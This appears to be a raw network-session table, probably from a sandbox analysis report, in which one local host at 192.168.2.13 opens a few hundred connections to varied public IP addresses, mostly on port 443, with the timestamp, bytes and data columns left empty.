                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12850192.168.2.1335974169.213.240.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12851192.168.2.134692031.9.128.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12852192.168.2.1356974173.215.61.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12853192.168.2.135809461.48.82.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12854192.168.2.1349552128.252.184.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12855192.168.2.134929431.8.128.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12856192.168.2.1355972178.145.140.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12857192.168.2.1351514180.119.84.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12858192.168.2.1352336123.111.46.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12859192.168.2.1339496135.212.248.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12860192.168.2.134655452.44.7.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12861192.168.2.1355310122.194.147.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12862192.168.2.135476819.106.57.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12863192.168.2.135935281.21.251.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12864192.168.2.135693488.230.229.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12865192.168.2.1340202100.61.141.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12866192.168.2.1347992160.201.99.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12867192.168.2.133662474.43.157.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12868192.168.2.135580257.156.44.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12869192.168.2.1342958211.228.191.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12870192.168.2.135278446.43.82.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12871192.168.2.134592614.201.186.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12872192.168.2.135132481.120.103.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12873192.168.2.133323640.178.65.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12874192.168.2.1339406216.253.119.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12875192.168.2.135329289.218.207.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12876192.168.2.134444453.164.188.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12877192.168.2.133789248.119.127.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12878192.168.2.1349078196.171.79.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12879192.168.2.1344810175.38.219.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12880192.168.2.135253075.168.98.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12881192.168.2.1346146188.73.207.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12882192.168.2.1354278148.176.227.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12883192.168.2.133823477.15.197.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12884192.168.2.1336510172.153.235.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12885192.168.2.1354254197.251.210.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12886192.168.2.133359625.214.209.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12887192.168.2.1344788202.46.85.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12888192.168.2.134775091.130.158.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12889192.168.2.1344942203.36.89.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12890192.168.2.134773495.162.221.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12891192.168.2.135815858.20.143.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12892192.168.2.1342930191.174.8.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12893192.168.2.1356634188.177.99.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12894192.168.2.135774869.119.139.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12895192.168.2.1347932141.166.50.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12896192.168.2.135290487.106.74.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12897192.168.2.135084248.248.103.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12898192.168.2.1350870117.194.136.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12899192.168.2.1356874193.252.82.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12900192.168.2.13335229.219.14.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12901192.168.2.134690261.138.145.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12902192.168.2.135848066.15.58.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12903192.168.2.135479077.5.140.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12904192.168.2.134901250.245.123.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12905192.168.2.1349526110.195.229.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12906192.168.2.135400887.240.22.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12907192.168.2.1333028190.154.13.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12908192.168.2.134545873.7.194.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12909192.168.2.1343774130.69.50.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12910192.168.2.134330859.54.106.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12911192.168.2.133854096.57.21.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12912192.168.2.1341082192.13.100.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12913192.168.2.1351914148.223.33.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12914192.168.2.1340794173.227.185.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12915192.168.2.133899861.122.238.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12916192.168.2.1335522206.118.31.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12917192.168.2.1340108210.111.124.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12918192.168.2.1335668223.121.23.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12919192.168.2.135061862.254.11.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12920192.168.2.133524847.169.57.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12921192.168.2.1336994111.158.105.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12922192.168.2.134094857.180.58.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12923192.168.2.135864812.14.51.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12924192.168.2.134869435.143.236.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12925192.168.2.1349864189.56.220.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12926192.168.2.136063037.56.4.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12927192.168.2.1346054208.30.181.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12928192.168.2.1342956144.11.20.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12929192.168.2.134717450.187.175.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12930192.168.2.135475223.167.199.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12931192.168.2.1348684119.237.38.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12932192.168.2.1339062208.37.162.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12933192.168.2.1341978102.64.21.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12934192.168.2.1352660162.114.51.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12935192.168.2.1334718207.108.93.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12936192.168.2.1349832161.140.168.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12937192.168.2.135245473.92.124.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12938192.168.2.134635898.161.80.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12939192.168.2.1351150163.83.5.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12940192.168.2.1347002205.119.38.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12941192.168.2.1339654107.249.176.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12942192.168.2.1343068195.51.35.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12943192.168.2.1335216137.24.68.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12944192.168.2.1351052102.142.43.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12945192.168.2.133782097.114.124.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12946192.168.2.1360550161.84.113.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12947192.168.2.1337326156.171.173.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12948192.168.2.1353998154.165.55.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12949192.168.2.135599052.70.44.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12950192.168.2.133340440.137.208.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12951192.168.2.1357252142.255.72.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12952192.168.2.134962254.201.95.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12953192.168.2.133720674.109.28.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12954192.168.2.1340962167.48.226.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12955192.168.2.1352614151.121.178.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12956192.168.2.136047668.184.203.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12957192.168.2.1335044173.161.48.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12958192.168.2.1336124112.25.254.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12959192.168.2.1347802218.244.121.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12960192.168.2.1348720120.124.46.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12961192.168.2.1356612166.2.119.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12962192.168.2.134153849.206.0.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12963192.168.2.1341172148.64.194.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12964192.168.2.134346684.230.127.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12965192.168.2.134447052.42.231.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12966192.168.2.134034040.65.57.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12967192.168.2.1359758149.179.112.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12968192.168.2.134340066.132.78.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12969192.168.2.135536612.86.20.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12970192.168.2.134776837.204.0.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12971192.168.2.1360452201.235.110.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12972192.168.2.1344840207.83.60.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12973192.168.2.1360078197.225.104.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12974192.168.2.133933490.22.206.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12975192.168.2.1339370188.158.11.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12976192.168.2.135446697.183.217.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12977192.168.2.136038862.43.155.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12978192.168.2.1359744104.17.146.1418080
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12979192.168.2.1353168183.75.65.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12980192.168.2.1334860135.232.121.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12981192.168.2.1340724109.252.247.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12982192.168.2.1346570178.161.122.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12983192.168.2.1338972219.81.92.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12984192.168.2.134502876.249.162.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12985192.168.2.13368621.195.138.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12986192.168.2.1359656108.179.90.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12987192.168.2.133527472.148.37.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12988192.168.2.1350428164.51.182.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12989192.168.2.13429809.178.99.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12990192.168.2.1343128191.54.248.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12991192.168.2.1356886158.128.127.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12992192.168.2.134884893.10.167.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12993192.168.2.1352924221.128.64.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12994192.168.2.1336850118.66.53.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12995192.168.2.1342642107.136.36.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12996192.168.2.134028038.7.37.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12997192.168.2.134781076.61.97.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12998192.168.2.133323279.104.234.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12999192.168.2.1343740206.207.136.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13000192.168.2.1348428193.223.193.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13001192.168.2.1332840192.202.229.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13002192.168.2.1335450191.179.66.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13003192.168.2.1351396190.159.242.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13004192.168.2.133922837.40.224.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13005192.168.2.135825278.90.233.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13006192.168.2.135492457.123.20.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13007192.168.2.133460232.154.155.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13008192.168.2.135242657.66.106.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13009192.168.2.1352898160.67.58.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13010192.168.2.1351754190.210.161.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13011192.168.2.1346820189.83.5.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13012192.168.2.1345600173.194.21.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13013192.168.2.1351422161.200.38.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13014192.168.2.1341614132.156.200.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13015192.168.2.135724443.53.222.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13016192.168.2.134560873.38.63.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13017192.168.2.1357536177.97.19.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13018192.168.2.1336024200.176.253.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13019192.168.2.1342336120.112.251.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13020192.168.2.136018650.230.144.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13021192.168.2.136016090.152.107.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13022192.168.2.1341000151.128.1.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13023192.168.2.1344462181.136.31.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13024192.168.2.134807667.208.138.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13025192.168.2.1348228177.238.122.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13026192.168.2.1339356101.47.108.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13027192.168.2.1347960147.252.85.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13028192.168.2.1360408185.139.133.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13029192.168.2.13587005.56.223.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13030192.168.2.1349874151.76.248.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13031192.168.2.133840082.110.186.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13032192.168.2.1337822210.190.184.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13033192.168.2.1358964195.162.138.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13034192.168.2.133666440.82.211.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13035192.168.2.1360254167.231.225.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13036192.168.2.133716482.68.109.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13037192.168.2.1346432107.1.178.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13038192.168.2.133882887.117.150.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13039192.168.2.1350258194.238.40.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13040192.168.2.134650665.181.67.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13041192.168.2.133833434.235.19.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13042192.168.2.1360168201.131.218.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13043192.168.2.13494421.31.102.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13044192.168.2.133644694.197.121.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13045192.168.2.1354026135.216.180.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13046192.168.2.1358480205.47.105.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13047192.168.2.1345740200.30.7.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13048192.168.2.1333064213.91.166.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13049192.168.2.13424981.253.182.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13050192.168.2.1337242178.198.179.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13051192.168.2.134124861.53.87.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13052192.168.2.134555254.169.47.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13053192.168.2.134621849.106.57.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13054192.168.2.1337926186.134.26.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13055192.168.2.1347020123.79.35.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13056192.168.2.134622451.213.138.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13057192.168.2.134323646.225.100.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13058192.168.2.135573676.173.53.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13059192.168.2.135076831.45.135.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13060192.168.2.135122852.221.120.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13061192.168.2.135992471.177.57.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13062192.168.2.1347690208.131.188.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13063192.168.2.135884288.47.179.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13064192.168.2.135735095.249.176.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13065192.168.2.135923469.231.5.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13066192.168.2.134679690.16.242.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13067192.168.2.1342142147.17.156.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13068192.168.2.134764458.128.166.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13069192.168.2.1341770166.231.126.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13070192.168.2.135227086.141.144.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13071192.168.2.135758484.137.19.254443
                                                TimestampBytes transferredDirectionData


